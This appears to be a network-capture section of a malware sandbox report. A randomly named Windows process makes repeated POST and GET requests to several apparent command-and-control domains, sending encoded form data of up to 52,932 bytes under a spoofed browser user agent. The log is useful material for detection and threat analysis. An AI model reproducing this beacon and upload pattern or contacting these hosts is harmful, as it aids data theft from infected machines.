                                                Aug 27, 2024 07:59:09.322065115 CEST | 544 | OUT | GET /s1mg/?ij60MtY=2QViuhW/NYaw5nxi+F1oVZq46szrrR71oUxOni/Qn+PFEj/1SakqFOMu9uwTuSiQaklPQGQrKMR1DX8jJ/FrQ8LNcsmQ9XMkBTdB/FoVvRnsRxC4QNxtOLg=&wXB=brv4Erb HTTP/1.1
                                                Host: www.518729.xyz
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Language: en-us
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                13 | 192.168.11.20 | 49854 | 172.67.191.241 | 80 | 7116 | C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 07:59:14.967185020 CEST | 835 | OUT | POST /fp5q/ HTTP/1.1
                                                Host: www.cachsoicautdtc.best
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.cachsoicautdtc.best
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 204
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.cachsoicautdtc.best/fp5q/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Ascii: ij60MtY=sROdxZs/CdFUZLGRU7AT3IsYu+ftwVWulRWaFbGN3BkcMmG0209J/7yNW7FoXNBV6Q0mL9Wgdw+VL32eIMqH8Kr8Nee1XHY2Jmygl2YCOPJvczqrovqdDmZs5VamN18E99Q47UHDVrKDSMZI1UQXcPkrRtXjf+QBekDuqqjXFBbK+Ca269kREe0SLEAMIECE6A==
                                                Aug 27, 2024 07:59:15.080246925 CEST | 861 | IN | HTTP/1.1 301 Moved Permanently
                                                Date: Tue, 27 Aug 2024 05:59:15 GMT
                                                Content-Type: text/html
                                                Content-Length: 167
                                                Connection: close
                                                Cache-Control: max-age=3600
                                                Expires: Tue, 27 Aug 2024 06:59:15 GMT
                                                Location: https://www.cachsoicautdtc.best/fp5q/
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U6jDnhQojZdvarxqWgltmUV0LMN2RfsS%2FxUOHvTEAvsMOGs97OecMfmUGFgQXCN68gb80MSJXiG1hfqYCUmSIhYHzvoSsw4VQgJE76SIMlbiSQPl8La594aXHoO7iqiyYojBtb10wm3h%2Bg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Vary: Accept-Encoding
                                                Server: cloudflare
                                                CF-RAY: 8b99d59ee9d75728-IAD
                                                alt-svc: h3=":443"; ma=86400
                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                14 | 192.168.11.20 | 49855 | 172.67.191.241 | 80 | 7116 | C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 07:59:17.597347021 CEST | 1175 | OUT | POST /fp5q/ HTTP/1.1
                                                Host: www.cachsoicautdtc.best
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.cachsoicautdtc.best
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 544
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.cachsoicautdtc.best/fp5q/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 07:59:17.714504004 CEST | 865 | IN | HTTP/1.1 301 Moved Permanently
                                                Date: Tue, 27 Aug 2024 05:59:17 GMT
                                                Content-Type: text/html
                                                Content-Length: 167
                                                Connection: close
                                                Cache-Control: max-age=3600
                                                Expires: Tue, 27 Aug 2024 06:59:17 GMT
                                                Location: https://www.cachsoicautdtc.best/fp5q/
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R1sK7%2B9YLzBcOrZHiUyJhu%2FxMuIpCLsDFh9U9Lc2RRe7WUR4SYPCPf8xFwhsojgsCil1OnpiI7vPPzc%2FydCtUt%2BUdBAIkpNeuuNkCAmWznLHW4h73work7alkMIEvztMHkxmUaw1UMETog%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Vary: Accept-Encoding
                                                Server: cloudflare
                                                CF-RAY: 8b99d5af5d5bc5a1-IAD
                                                alt-svc: h3=":443"; ma=86400
                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                15 | 192.168.11.20 | 49856 | 172.67.191.241 | 80 | 7116 | C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 07:59:20.236553907 CEST | 1289 | OUT | POST /fp5q/ HTTP/1.1
                                                Host: www.cachsoicautdtc.best
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.cachsoicautdtc.best
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 52932
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.cachsoicautdtc.best/fp5q/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 07:59:20.351413012 CEST | 865 | IN | HTTP/1.1 301 Moved Permanently
                                                Date: Tue, 27 Aug 2024 05:59:20 GMT
                                                Content-Type: text/html
                                                Content-Length: 167
                                                Connection: close
                                                Cache-Control: max-age=3600
                                                Expires: Tue, 27 Aug 2024 06:59:20 GMT
                                                Location: https://www.cachsoicautdtc.best/fp5q/
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jCKk1nnDbvdpS19%2F%2FbMfTs92mCPUa2nrVQjD5Grc%2FupYJHzy4LWbRSxMx7hyQ7860XGWleobzltx2qLMSSQ9wWKB5lHZHeYdX23UPJcuGkZhtB4ZOlnSUkf23fdb%2FqkJtdLt4WnHIaplzw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Vary: Accept-Encoding
                                                Server: cloudflare
                                                CF-RAY: 8b99d5bfcd10690c-IAD
                                                alt-svc: h3=":443"; ma=86400
                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                16 | 192.168.11.20 | 49857 | 172.67.191.241 | 80 | 7116 | C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 07:59:22.873028994 CEST | 553 | OUT | GET /fp5q/?ij60MtY=hTm9ypMPCvkZHpXOUIowtI5N2+z4niygtjCFVe/8mioZPRfz5TFJ3IewZaR+NPU03UUaFdubUQ2FIRqoOOixztWDEcr2XGgHHm20+kxsPtJkRiaVsamec0k=&wXB=brv4Erb HTTP/1.1
                                                Host: www.cachsoicautdtc.best
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Language: en-us
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 07:59:22.989088058 CEST | 979 | IN | HTTP/1.1 301 Moved Permanently
                                                Date: Tue, 27 Aug 2024 05:59:22 GMT
                                                Content-Type: text/html
                                                Content-Length: 167
                                                Connection: close
                                                Cache-Control: max-age=3600
                                                Expires: Tue, 27 Aug 2024 06:59:22 GMT
                                                Location: https://www.cachsoicautdtc.best/fp5q/?ij60MtY=hTm9ypMPCvkZHpXOUIowtI5N2+z4niygtjCFVe/8mioZPRfz5TFJ3IewZaR+NPU03UUaFdubUQ2FIRqoOOixztWDEcr2XGgHHm20+kxsPtJkRiaVsamec0k=&wXB=brv4Erb
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gxosQdTKMOWHY81giBzW83%2BRUuh7HAZzQKyS353OtKTIwlO5dloKpgDiluPBqbV57GbsQSmuRwYHJoCuyWcNCeHrszL507sIVIufvcVvaDL4tDYdAyWvU9L3Gmj7MHZ5SOJRwIbbga0B%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8b99d5d04cb52d1c-IAD
                                                alt-svc: h3=":443"; ma=86400
                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                17 | 192.168.11.20 | 49858 | 172.67.166.145 | 80 | 7116 | C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 07:59:28.217051983 CEST | 832 | OUT | POST /p1v4/ HTTP/1.1
                                                Host: www.itemfilterhub.shop
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.itemfilterhub.shop
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 204
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.itemfilterhub.shop/p1v4/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Ascii: ij60MtY=aUfPfTh9K6lI4yXcCC6CFjl3yB+bL1qfMlYnJr7kl1MGvZo/Kz3bNsmk6lC3p/LtATiFs8MksKzXrwgVXaHP42EXNZmH4N/z1SUpRAuNeijugl7BXkydYWsJrFFzddT0BYzfK/GcSp6NrdfZsO1+Jgej/orOb2WD2/U1z0VjdSQNc2Exu89Fu/bYHeSX6xKdwA==
                                                Aug 27, 2024 07:59:28.482920885 CEST | 746 | IN | HTTP/1.1 404
                                                Date: Tue, 27 Aug 2024 05:59:28 GMT
                                                Content-Type: text/html;charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FqcH3EsNJ%2FvQrU2gP3cU0QokFncPJLtZuuOchMPmwPJyzDJU%2B3Jqub4uItKEVaHJe8V62bIJhKuLB6Yo4PNF4ZceW0iQsTFFPFPtog%2B3cZ6E2YkGK5qIUd51Uie3TF2P2OC5yuHcdUsj"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8b99d5f1bec2884b-IAD
                                                Content-Encoding: gzip
                                                alt-svc: h3=":443"; ma=86400
                                                Aug 27, 2024 07:59:28.482933998 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                18 | 192.168.11.20 | 49859 | 172.67.166.145 | 80 | 7116 | C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 07:59:30.858716965 CEST | 1172 | OUT | POST /p1v4/ HTTP/1.1
                                                Host: www.itemfilterhub.shop
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.itemfilterhub.shop
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 544
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.itemfilterhub.shop/p1v4/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 07:59:31.128812075 CEST | 744 | IN | HTTP/1.1 404
                                                Date: Tue, 27 Aug 2024 05:59:31 GMT
                                                Content-Type: text/html;charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kcd1Ew68jj6NNftWAh5NTr2Fdkr12H40vqxgVzDcd6TSt35EqTcKsznW2861yDMjIG%2Bhr2jrzqBN5X%2BCjD6ElEuHu8MXPCXeFtRprp3YRwm%2FjclUHyLikx9x2XLTIrPCWFND7t5N1IjU"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8b99d6023b642d1b-IAD
                                                Content-Encoding: gzip
                                                alt-svc: h3=":443"; ma=86400
                                                Aug 27, 2024 07:59:31.128827095 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                19 | 192.168.11.20 | 49860 | 172.67.166.145 | 80 | 7116 | C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 07:59:33.499574900 CEST | 2578 | OUT | POST /p1v4/ HTTP/1.1
                                                Host: www.itemfilterhub.shop
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.itemfilterhub.shop
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 52932
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.itemfilterhub.shop/p1v4/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 07:59:33.944830894 CEST | 734 | IN | HTTP/1.1 404
                                                Date: Tue, 27 Aug 2024 05:59:33 GMT
                                                Content-Type: text/html;charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FaoOuLDvkP42IhjTPqjAnqewpXUKwDDLKIHtZwVLbM%2Fi6GCKz7XFHGON9ZchIRDzmWppr7iFIDKdhueJk9GxrK7gW7ppxqSTfDSV140vrwa9mh7oUU0Tp2ewWHWp663lOanrkDA4%2BXZ7"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8b99d612bdf43946-IAD
                                                Content-Encoding: gzip
                                                alt-svc: h3=":443"; ma=86400
                                                Aug 27, 2024 07:59:33.944861889 CEST | 15 | IN | Data Raw: 61 0d 0a 03 00 96 12 38 3e a1 00 00 00 0d 0a
                                                Data Ascii: a8>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                20 | 192.168.11.20 | 49861 | 172.67.166.145 | 80 | 7116 | C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 07:59:36.135802031 CEST | 552 | OUT | GET /p1v4/?ij60MtY=XW3vckNGBZMqkh6dDgKTVQdtxgWhQhuqI1UaXPyLgSYWv7ViPFn3HMqwy3qnuuGBWlC3pPEFi6D5pQsjZrraxjUjA6OulNf3kQwJOyuMay6JsEDMWEmFSkY=&wXB=brv4Erb HTTP/1.1
                                                Host: www.itemfilterhub.shop
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Language: en-us
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 07:59:36.398654938 CEST | 744 | IN | HTTP/1.1 404
                                                Date: Tue, 27 Aug 2024 05:59:36 GMT
                                                Content-Type: text/html;charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3Qo%2B0euOpWM6nIjSM4fXDN2SOwXlwMgzitGttylGWqgsFr1AC1uvr6WvIdsohoQ2aaqsg260UM%2F6GTnpjW31vsbz6Y%2BcPn8YejWGuXSafuqab6nxYxIL4AkfPzv3uUP1bHP7l79ekIHH"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8b99d6232bd31fe2-IAD
                                                alt-svc: h3=":443"; ma=86400
                                                Data Ascii: a1<html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.15.0</center></body></html>
                                                Aug 27, 2024 07:59:36.398694992 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                21 | 192.168.11.20 | 49862 | 203.161.46.205 | 80 | 7116 | C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 07:59:41.772563934 CEST | 814 | OUT | POST /veti/ HTTP/1.1
                                                Host: www.bullbord.top
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.bullbord.top
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 204
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.bullbord.top/veti/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 07:59:41.945604086 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                Date: Tue, 27 Aug 2024 05:59:41 GMT
                                                Server: Apache
                                                Content-Length: 16052
                                                Connection: close
                                                Content-Type: text/html
                                                Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                22 | 192.168.11.20 | 49863 | 203.161.46.205 | 80 | 7116 | C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 07:59:44.466876030 CEST | 1154 | OUT | POST /veti/ HTTP/1.1
                                                Host: www.bullbord.top
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.bullbord.top
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 544
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.bullbord.top/veti/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 07:59:44.637384892 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                Date: Tue, 27 Aug 2024 05:59:44 GMT
                                                Server: Apache
                                                Content-Length: 16052
                                                Connection: close
                                                Content-Type: text/html


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                23 | 192.168.11.20 | 49864 | 203.161.46.205 | 80 | 7116 | C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 07:59:47.172384024 CEST | 2578 | OUT | POST /veti/ HTTP/1.1
                                                Host: www.bullbord.top
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.bullbord.top
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 52932
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.bullbord.top/veti/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 07:59:47.696114063 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                Date: Tue, 27 Aug 2024 05:59:47 GMT
                                                Server: Apache
                                                Content-Length: 16052
                                                Connection: close
                                                Content-Type: text/html


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                24 | 192.168.11.20 | 49865 | 203.161.46.205 | 80 | 7116 | C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 07:59:49.869117975 CEST | 546 | OUT | GET /veti/?ij60MtY=CTwFRHkEL7GCscIqZBh2ghsqK7sG3QtVuFrIQG0IMtDLIws7wIuLhg5F5RICghophROLKQKALEwFGf2MtTv3MXBKvDNA89h+ifbsdhYGPDKJkkgMD8vmo5o=&wXB=brv4Erb HTTP/1.1
                                                Host: www.bullbord.top
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Language: en-us
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 07:59:50.039510012 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                Date: Tue, 27 Aug 2024 05:59:49 GMT
                                                Server: Apache
                                                Content-Length: 16052
                                                Connection: close
                                                Content-Type: text/html; charset=utf-8


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                25 | 192.168.11.20 | 49866 | 18.183.3.45 | 80 | 7116 | C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 07:59:55.831015110 CEST | 832 | OUT | POST /y82c/ HTTP/1.1
                                                Host: www.cannulafactory.top
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.cannulafactory.top
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 204
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.cannulafactory.top/y82c/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Ascii: ij60MtY=hJK5Y1p6zryccGDVzpMwi0rEwrzQIlebQLZg86bz+mwkVU7Ua2ZKiPw2cD3iYcemU+JHC15GhD7WDOqav3sOB59fwhQ6n1Y+MH1dQ2IbGxVX9S3XTt2u1dP2yEUMKGtebWysXLirzQY8WbfqDGSbEqXZvqIjdVEUbwIGiTMzxGXnc/MrAoRKxVTi37VKt3mJGA==
                                                Aug 27, 2024 07:59:56.100285053 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                Server: nginx/1.20.1
                                                Date: Tue, 27 Aug 2024 05:59:55 GMT
                                                Content-Type: text/html
                                                Content-Length: 3971
                                                Connection: close
                                                ETag: "6526681e-f83"
                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #900; color: #fff; font-weight: normal; [TRUNCATED]
                                                Aug 27, 2024 07:59:56.100389957 CEST | 1289 | IN | Data Ascii: h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #900; font-size: 1.1em;
